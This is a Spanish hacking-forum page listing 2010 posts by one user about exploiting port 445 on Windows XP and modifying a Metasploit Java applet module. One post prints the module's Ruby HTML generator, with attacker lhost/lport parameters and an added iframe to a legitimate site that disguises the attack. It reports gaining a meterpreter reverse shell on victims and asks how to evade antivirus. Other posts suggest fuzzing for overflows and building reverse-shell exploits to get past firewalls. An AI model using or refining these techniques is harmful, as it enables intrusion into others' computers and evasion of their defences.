Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - darko666

#21
Pero que pasa con el ms08_67!!! tenía entendido que esta un poco obsoleto!
Realmente funciona contra un Windows actualizao??
#22
Hacking / Re: windows XP 445
3 Abril 2010, 00:54 AM
Cita de: Alex@ShellRoot en  3 Abril 2010, 00:26 AM
Cita de: darko666 en  2 Abril 2010, 23:50 PMY entonces que consigues con analizar un servicio con un fuzzer???
http://en.wikipedia.org/wiki/Fuzz_testing

buff!! Parece un poco complicao
intentare hacer pruebas con metasploit que me parece que lleva algún tipo de fuzzer
#23
Hacking / Re: windows XP 445
2 Abril 2010, 23:50 PM
Entendido. Gracias.
Y entonces que consigues con analizar un servicio con un fuzzer???
Cita de: ..::| D3Bć1 |::. en  2 Abril 2010, 16:35 PM
Cita de: darko666 en  1 Abril 2010, 23:21 PM
Es posible explotar el puerto 445 de un Windows XP completamente parcheado y actualizado?
Analiza el servicio con un fuzzer y busca BoF o SoF para explotarlo y construyete tu propio exploit con algun payload de reverse shell para bypassear parte de los firewalls.

Saludos
#24
No seria la ostia, seria la repolla!! :laugh:
#25
Hacking / Re: windows XP 445
2 Abril 2010, 21:40 PM
Lo que no entiendo es porque se ha de construir un exploit personalizado para un determinado s.o.     cuando teóricamente el servicio que corre por el puerto 445 es común en el s.o.
No se si me explico.
#26
Pues eso estaría bien!!
#27
Hacking / windows XP 445
1 Abril 2010, 23:21 PM
Es posible explotar el puerto 445 de un Windows XP completamente parcheado y actualizado?
#28
Hacking / Re: Redireccionar JavaApplet
1 Abril 2010, 22:46 PM
Interesante, eh?
pero este modulo de metasploit me parece que no se le puede poner ningun encoder.

No se, ya me diras si a tí te saltan o no los antivirus.
#29
Hacking / Re: Redireccionar JavaApplet
1 Abril 2010, 22:32 PM
de la 450 a la 459.
Aquí te pongo las ultimas 15 lineas del fichero

def generate_html( data, host, port )
      html  = "<html><head><title>Loading...</title></head>"
      html += "<body>"
      html += "<applet archive=\"#{datastore['APPLETNAME']}.jar\" "
      html += "code=\"#{datastore['APPLETNAME']}.class\" width=\"1\" height=\"1\">"
      html += "<param name=\"data\" value=\"#{data}\"/>" if data
      html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
      html += "<param name=\"lport\" value=\"#{port}\"/>" if port
      html += "</applet>"
      html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"
      html += "</body></html>"      
   return html
   end
end

Hay alguna forma de no hacer saltar el antivirus?
#30
Hacking / Re: Redireccionar JavaApplet
1 Abril 2010, 22:11 PM
Vas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Le añades una sentencia similar a:
html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"

Y cuando abres el metasploit y lo ejecutas, te genera el index.html esperando en el puerto que le hayas indicado.
El resultado es que cuando la víctima abre la página, le sale la ventanita del java applet a la vez que se va cargando el link del iframe. Lo he probado sobre un xp sp3 (sin antivirus) con la ultima version de explorer, firefox y safari y en los 3 el metasplot me ha devuelto el deseado meterpreter. El único problema, és que con un buen antivirus no funciona, porque detecta que alguien se intenta conectar a la máquina. No se si hay alguna forma de que la infección por java pueda ser totalmente indetectable por los antivirus.